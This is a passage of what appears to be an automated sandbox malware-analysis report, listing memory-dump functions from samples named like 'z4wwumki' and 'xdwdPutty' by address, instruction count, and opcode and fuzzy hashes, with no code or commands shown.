                              • Opcode ID: 5ff4cfa021267681c9ff2d0544d7b5dc1b5d8b69fde433c56ae32904c347640d
                              • Instruction ID: 95e7a1af9ab0cb1bb35a38c80ef6a1ad3a8074d688f659fd377f31aeb6f4d4d4
                              • Opcode Fuzzy Hash: 5ff4cfa021267681c9ff2d0544d7b5dc1b5d8b69fde433c56ae32904c347640d
                              • Instruction Fuzzy Hash: 10116630E4C54E8AFBAC9A2884A53BD77D1EB95311F600A7EDA1FD33D3DD2858454781
                              Function 00007FFF60F4BC1D Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aac4407d2597030eb683e0c465c20675a5e8c20c4964f611080aeacc32dcb7de
                              • Instruction ID: 06d25286c2c2a6c3203182a4fb52c903b0c4afb9b20e94ab793f03003f913eb8
                              • Opcode Fuzzy Hash: aac4407d2597030eb683e0c465c20675a5e8c20c4964f611080aeacc32dcb7de
                              • Instruction Fuzzy Hash: 2F114220D4C54A8AFB688A6484A53BD77E1DF95320F244A7EDA1FC77D3CD2C68414741
                              Function 00007FFF60F4C6FF Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 117a920ecc1b8b418dfa2015528925913ea7d05a6ace1d1ae9441c0b6cd01fb1
                              • Instruction ID: 9045d797790317ec20d59448e6557adfef6b2c363d1f7a91f13f54313af246c2
                              • Opcode Fuzzy Hash: 117a920ecc1b8b418dfa2015528925913ea7d05a6ace1d1ae9441c0b6cd01fb1
                              • Instruction Fuzzy Hash: 15015E32E1C5298AFF98B258E8420FCB3D1EB45324F15153BD94E93693ED1E2C174795
                              Function 00007FFF60F42E69 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6cfef4b970a6e7858b8cb3f6fb2c9342ecc73e60e9e101996f0f820f9aacd454
                              • Instruction ID: eca617bff806c032ceb3a9eb63689c99f5f8d12ca632771a01a68b7f64770d41
                              • Opcode Fuzzy Hash: 6cfef4b970a6e7858b8cb3f6fb2c9342ecc73e60e9e101996f0f820f9aacd454
                              • Instruction Fuzzy Hash: 8D018C11F0C80B8BEB94B768C8AA27D62C7DF95316FA00474D40EC73D7ED2DA8464385
                              Function 00007FFF60F421FE Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6493a373764937fa48d7cf867e8bd98443d95dd600e9e3adcfc18d1946d49d78
                              • Instruction ID: 76a1d820667373fe5643545f32378414dec87dc0cc3c1b37a810ddaadc76b637
                              • Opcode Fuzzy Hash: 6493a373764937fa48d7cf867e8bd98443d95dd600e9e3adcfc18d1946d49d78
                              • Instruction Fuzzy Hash: A801DA21D2C11790FAECA560984A27923C0DF65345FF05938DD4CD2BD3AE9FBE6A4391
                              Function 00007FFF60F48EA0 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e60cca8d0817d33ab46a7cde0ba29f99f6815009eedbfdaf5ddd74cea27fc96a
                              • Instruction ID: fa361b8a15241bc732d12ad003f3d16e59c4c6d0703864cd30306b2c78c0e46b
                              • Opcode Fuzzy Hash: e60cca8d0817d33ab46a7cde0ba29f99f6815009eedbfdaf5ddd74cea27fc96a
                              • Instruction Fuzzy Hash: 6A017131B0C559CFEB5097ACD0845EC7BE1EFA9310F2800BAC40DE7292DD7998628745
                              Function 00007FFF60F43450 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3d279520c417cd9213e14c9b3248d6030b34dfb8ffb8eb37e97c30c9685c87e
                              • Instruction ID: 7d0b305dd82c72445903b0a9ce5be23ea166c010573224e903d2898fe3277f08
                              • Opcode Fuzzy Hash: a3d279520c417cd9213e14c9b3248d6030b34dfb8ffb8eb37e97c30c9685c87e
                              • Instruction Fuzzy Hash: 04F0C416C1C83685FAA2BA68A1982F853C0EF64321F6608B0DDAD673D38D1D2D9403D6
                              Function 00007FFF60F43509 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 612c3c0df81ed175fb6e9ed47896a23bc8cf470221b667e28d6c0d385555aa55
                              • Instruction ID: 9d6f74d682ca311d4f6558f210f9a82177ffdc480b7b586cbde317a84796bace
                              • Opcode Fuzzy Hash: 612c3c0df81ed175fb6e9ed47896a23bc8cf470221b667e28d6c0d385555aa55
                              • Instruction Fuzzy Hash: 26F09A22E0D4368AFAA8663CA0403F862C1EB48364F5A00B6DC0DD73C6EC1C7C814790
                              Function 00007FFF60F4D94B Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d277823cc534aab026f32a9898134a2ff7052e3e81b7eeaae2c0abbf01089d02
                              • Instruction ID: c0618b324e8c01cd041355ed91694e3a8c00dc8e21dd8d72fdaa641d594cd945
                              • Opcode Fuzzy Hash: d277823cc534aab026f32a9898134a2ff7052e3e81b7eeaae2c0abbf01089d02
                              • Instruction Fuzzy Hash: E9F09011D1C5294BEBD4B62890896BD73D1DB55360F4504B8EC4DE73C6DD1C7E818782
                              Function 00007FFF60F4A68F Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2f35492c7acb07925c57731641302a44f0d8cb53dbefc235b1ece078b42f499d
                              • Instruction ID: dc04f04795c12eddcfaada61528f6fe6d9de0c0ff50a17f9f5fee16c820d1dad
                              • Opcode Fuzzy Hash: 2f35492c7acb07925c57731641302a44f0d8cb53dbefc235b1ece078b42f499d
                              • Instruction Fuzzy Hash: 6EF01D30A18D1A8EE799E728445527DA3D2FF88301B9045B9D80DD73D6EF2858428701
                              Function 00007FFF60F4BB9D Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cdea410bf814962978e097ca54647d3e339272f80d321a66fef4296efbeb9780
                              • Instruction ID: 18cb3d2e293297e04dca6166097ea9b245f0255e60c90463d95bc57adfc8953f
                              • Opcode Fuzzy Hash: cdea410bf814962978e097ca54647d3e339272f80d321a66fef4296efbeb9780
                              • Instruction Fuzzy Hash: ADE09A22A1C2024BF7214294A4C12E977D1EBA6320F6949B2ED08876D7EC0D24838383
                              Function 00007FFF60F43AB8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65a5fbc819ed9a5149688ce5e666a7c42b764d2d9884591cc254a5793f045a92
                              • Instruction ID: 54ca0ac0a9d78c065911fb2a111ba5c2fef9f562c6f5a65dd6bd6f3832638804
                              • Opcode Fuzzy Hash: 65a5fbc819ed9a5149688ce5e666a7c42b764d2d9884591cc254a5793f045a92
                              • Instruction Fuzzy Hash: 51E0ED80E1DD0A49EAA8626D546927E22C1DFD8320F780176DE0EC27C7EC9C5C8343E5
                              Function 00007FFF60F43537 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ccd97cca20b3f64605d5a45f22253677bb0b60498b164d9023a00b9c81225060
                              • Instruction ID: 863c06469decf0ab6e8ed12fd5822c1d6ce2983a45e0486414704f9a7c906396
                              • Opcode Fuzzy Hash: ccd97cca20b3f64605d5a45f22253677bb0b60498b164d9023a00b9c81225060
                              • Instruction Fuzzy Hash: A4F03032E0D5A78BFA646638A0512F863C1DF583A5F1900BADD0DD73C3EC2D6C818791
                              Function 00007FFF60F4C98F Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ddf2472fc4ead3fb18382aaebe6bafce2d14db1bcb773b9c7c6ae013934aa6d2
                              • Instruction ID: 97af0ab6bdd1d20622fe866164753a7f532d525218f6a229b44964163e7a39a9
                              • Opcode Fuzzy Hash: ddf2472fc4ead3fb18382aaebe6bafce2d14db1bcb773b9c7c6ae013934aa6d2
                              • Instruction Fuzzy Hash: 1CD05E3261C5144DEB0CB258F8431FC73C0E781230F10153BD20AC2143EC5A24224684
                              Function 00007FFF60F4D6EF Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5ef0bf1121d0881435a78a48b34a2ef0edf1b1c8d3bb116f9fdabe32ff1037c
                              • Instruction ID: 0e89565f163a3d98f3c941e90698c71fa412a5738b94592396e761b3aa0c210e
                              • Opcode Fuzzy Hash: e5ef0bf1121d0881435a78a48b34a2ef0edf1b1c8d3bb116f9fdabe32ff1037c
                              • Instruction Fuzzy Hash: 3ED0A722B1C81F865AA0B24C34411FDA3D2DBC4172B540273C50EC2243CD1624434381
                              Function 00007FFF60F4BD16 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ba8b59fa3b0d6be9c79573bc13ef2992636f240117d421d81e5dce82924db44f
                              • Instruction ID: dbca02c25917c2e4b14640a5ec2721ea0718eb1fb24a12a1da01a09a64c4e3de
                              • Opcode Fuzzy Hash: ba8b59fa3b0d6be9c79573bc13ef2992636f240117d421d81e5dce82924db44f
                              • Instruction Fuzzy Hash: 3DD05E3160D91DCEDB55A7A494553FD77A0FF85715F90087AE60EC6283CF3984A8C780
                              Function 00007FFF60F48613 Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8524a7a2a552b4bcd9c5158f899c8dc1a01c38a290f8b820510e520fdb922612
                              • Instruction ID: 45cae3d0f934d44f66fcc59700b503f3aa3d32871223721ed88cd60bbe340f8c
                              • Opcode Fuzzy Hash: 8524a7a2a552b4bcd9c5158f899c8dc1a01c38a290f8b820510e520fdb922612
                              • Instruction Fuzzy Hash: 62D01216718D082B1640E15C584B6F963D2D7E81A1B18017AE40DC3A65DD24D9838343
                              Function 00007FFF60F4C41E Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 587c276b17fcb286a9327f52796d8e029839630d41f35f9c3925a88eeaaf213e
                              • Instruction ID: df64f1db2b3f6725a7fd6d52be0e33135298c4d2fb4bb06c8a79b1649ac56edc
                              • Opcode Fuzzy Hash: 587c276b17fcb286a9327f52796d8e029839630d41f35f9c3925a88eeaaf213e
                              • Instruction Fuzzy Hash: E3D0C900B1CC295A76C9B22800692BE51C3EBD8681B644079E80EC33D3ED2C59431302
                              Function 00007FFF60F48330 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b62f464f4c1e5aa773b7f19f7448cc76395a131dfdf51af849d157ed5f2b2e0
                              • Instruction ID: 4d4ef114207d87e3135eff89f6e08a20a18d6ac0d5ce9cdf5edf4df4648c5905
                              • Opcode Fuzzy Hash: 7b62f464f4c1e5aa773b7f19f7448cc76395a131dfdf51af849d157ed5f2b2e0
                              • Instruction Fuzzy Hash: 67D0A73160F3558EF719277559156E877A0DE45295B5804FEE808C82D3E82EC1D28341
                              Function 00007FFF60F4168A Relevance: .0, Instructions: 11COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a92dda00be3ee014da57bcd7c81ee2a2c4d9d795bb0e0eb5b5a289b22b20b39f
                              • Instruction ID: 6bfdb2e7059d90fdac4150ba8954386c5b89023ede0a304ccf358bf162a4206c
                              • Opcode Fuzzy Hash: a92dda00be3ee014da57bcd7c81ee2a2c4d9d795bb0e0eb5b5a289b22b20b39f
                              • Instruction Fuzzy Hash: 58D01211D1D0565BE7116BA888941B97B90EF05224F1D04B9D88C9B1D3CD6C5A138756
                              Function 00007FFF60F4B593 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c853be64ce9d9c4c62076938cb5eb25686f4bfe4ce3f1ae0c868ae3877c28f4
                              • Instruction ID: 3c82d1cf50bb879c828a181fd4199f5d76fe245b3d6c8e694d7c1590cab2d83a
                              • Opcode Fuzzy Hash: 2c853be64ce9d9c4c62076938cb5eb25686f4bfe4ce3f1ae0c868ae3877c28f4
                              • Instruction Fuzzy Hash: BBB01411135404555345D714C45D1F533D0F75C1017400D35544DD1155FC0455414345
                              Function 00007FFF60F4CF74 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf535597b345de27fcccdfa5221d8f9eb5b193b1421f07b0ffeea66f3de0835f
                              • Instruction ID: 7d3d119a2726ba7acae70701b4f68306ee798082d89766e74378145cb17ba9b2
                              • Opcode Fuzzy Hash: cf535597b345de27fcccdfa5221d8f9eb5b193b1421f07b0ffeea66f3de0835f
                              • Instruction Fuzzy Hash: B9A0222BBC082800A20000CEBC030E8F320C8C003AB0B2033EA2CC8E80C08B80A30080
                              Function 00007FFF60F4CE05 Relevance: .0, Instructions: 8COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebd4a8e329742e5237db11218f5a667f8173d4cc0c06eb07c37b914c535174c4
                              • Instruction ID: 4519ce27facac357d46877acc1d5b1a1d0c0dbb628b6b4b3de6ad867aabfb470
                              • Opcode Fuzzy Hash: ebd4a8e329742e5237db11218f5a667f8173d4cc0c06eb07c37b914c535174c4
                              • Instruction Fuzzy Hash: A2A002236C682D05A54410DE3C530D4F249C9D507978B2457E95CDAE40D69B8AF24281

                              Non-executed Functions

                              Function 00007FFF60F40928 Relevance: 5.0, Strings: 4, Instructions: 23COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: S;$![;$"c;$#k;
                              • API String ID: 0-1519754266
                              • Opcode ID: 3e74a522500bc112a3e65dcd940cd1ef26bdf5b78b8f385450e7802d52ca813d
                              • Instruction ID: 7058038c0dcf333c0e42229b1bcc1eaebe0392da0d6369720a37ac6de66c2b80
                              • Opcode Fuzzy Hash: 3e74a522500bc112a3e65dcd940cd1ef26bdf5b78b8f385450e7802d52ca813d
                              • Instruction Fuzzy Hash: B3D05E1B734C3B039244779DB4602D9D3C4E7C80F33908A73E741C228252507847C3E0

                              Executed Functions

                              Function 00007FFF60F4CB29 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: tM_^%
                              • API String ID: 0-1593119267
                              • Opcode ID: 0562f48671ffad9723fca9dcef392b0ba7196909c03df858d8f5df3958b76961
                              • Instruction ID: d6359fb2ebdd1e3def0fc01af0ba9da30694cf0715f471dbb0cc24b5bc46a39a
                              • Opcode Fuzzy Hash: 0562f48671ffad9723fca9dcef392b0ba7196909c03df858d8f5df3958b76961
                              • Instruction Fuzzy Hash: B0617561D0D2D6CFEBE6522498552713BA0CF62304F2928B6C98CCB2E3ED0D681D83D2
                              Function 00007FFF60F4996B Relevance: .5, Instructions: 523COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 95a6188730d578fc562dbd969b702de0c093a95f97131d2e31c2798007f397a0
                              • Instruction ID: 91051a9033f4d1076da4af36fd98a4825f111c861b5864abfe9954cde8dd8e45
                              • Opcode Fuzzy Hash: 95a6188730d578fc562dbd969b702de0c093a95f97131d2e31c2798007f397a0
                              • Instruction Fuzzy Hash: 92F11726E1C54B8AFB19BB6898422F977D0DF51320F2801BDD84AC7697FD1CB50B8392
                              Function 00007FFF60F4B875 Relevance: .4, Instructions: 449COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a383ae794349d91bcee524fc0dcde67e6a0a2ebd3a362d04de4959e22737e946
                              • Instruction ID: 5ba93c6949723e653641edc745ece2986f3c037b43da60cc430bb410337d613b
                              • Opcode Fuzzy Hash: a383ae794349d91bcee524fc0dcde67e6a0a2ebd3a362d04de4959e22737e946
                              • Instruction Fuzzy Hash: 16D1B311D1D2878EFB66922498961BD3BE0DF16311F7909B6CD89CB2D3ED0D684B8392
                              Function 00007FFF60F4C012 Relevance: .3, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0b6432b4ccdc92eb76959bd61c9f8579e828adcdd9f14b0be6838cf72fa2269
                              • Instruction ID: 91e37b4dedcd461d643a513b7d25da7111fe147c31c9e0f1d1244b81ed84cd6c
                              • Opcode Fuzzy Hash: e0b6432b4ccdc92eb76959bd61c9f8579e828adcdd9f14b0be6838cf72fa2269
                              • Instruction Fuzzy Hash: 32B1E521D0C686CAFBE9966888562B87BD0EF55300F74297AD84DC73D3ED5C690E83D2
                              Function 00007FFF60F4CFC0 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: !L]H
                              • API String ID: 0-928549208
                              • Opcode ID: bb8d72cc381e8af149b85c679afb650ebf86d3d22296382813dd929aed25742e
                              • Instruction ID: 0c2bf58ff7fea98421c3d4a350f44214306e93eb790f605d78d316dc68dbe9eb
                              • Opcode Fuzzy Hash: bb8d72cc381e8af149b85c679afb650ebf86d3d22296382813dd929aed25742e
                              • Instruction Fuzzy Hash: 8D71AE26E4C5178AFB98E66898523BA33C1DF98310F640179E94EC33D3FD1CA80A4392
                              Function 00007FFF60F4290A Relevance: .8, Instructions: 816COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbca8ad46f2ff0ac04e1631f0bd7232a9d2eb31dad451241b0c141f20ec9cb4c
                              • Instruction ID: d4014ef7db52370e018c9ee004b2d8f0c801947b792528717db111a814120787
                              • Opcode Fuzzy Hash: dbca8ad46f2ff0ac04e1631f0bd7232a9d2eb31dad451241b0c141f20ec9cb4c
                              • Instruction Fuzzy Hash: 98524B21F5D51B8BFB94AB2890916BA36D2EF98311FA10835E40EC73D7EE3DAD424351
                              Function 00007FFF60F42B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8bd62d2866b92b6574b0eeae4ae5e210bb290870f6f34a29d668cd0ae086590d
                              • Instruction ID: 8e0c4d128a4028ddc1149c753152a24b96b3f48eb93f9a54db0f85d3f85925d2
                              • Opcode Fuzzy Hash: 8bd62d2866b92b6574b0eeae4ae5e210bb290870f6f34a29d668cd0ae086590d
                              • Instruction Fuzzy Hash: BFC12B21F5D50B8AFB98A76890A15BE26D3EF98311FA50839D40EC77D7EE3DAC424311
                              Function 00007FFF60F43550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f84de00100b879b6a44cb562fb504de29c58891eccb08dbbe63df03bd6e78187
                              • Instruction ID: b49598650e749704610032c880a3512724d599444612a29b54bf2fb2d0e4cfbc
                              • Opcode Fuzzy Hash: f84de00100b879b6a44cb562fb504de29c58891eccb08dbbe63df03bd6e78187
                              • Instruction Fuzzy Hash: 5D51AF71C2C4678AF7781668E4824F9A7C1EF55360FA64078DCAD837C7AD1C6CA642C2
                              Function 00007FFF60F4CD40 Relevance: .2, Instructions: 203COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000024.00000002.1207755036.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7fff60f40000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 506fc1f751835f7b32e3efeb92e08d034a510be588c66f125a50709b42f07e99
                              • Instruction ID: 1f5ad80033271066dc3d70057312699133600dbf2e2308fad113380b21da1ced
                              • Opcode Fuzzy Hash: 506fc1f751835f7b32e3efeb92e08d034a510be588c66f125a50709b42f07e99
                              • Instruction Fuzzy Hash: 29519E37E0C13A86E754BA1CB4922FA73E0EF95335F50097BCA48C62C3DE19748A8794
                              Function 00007FFF60F48635 Relevance: .2, Instructions: 201COMMON
                              Download Yara Rule
                              Memory Dump Source
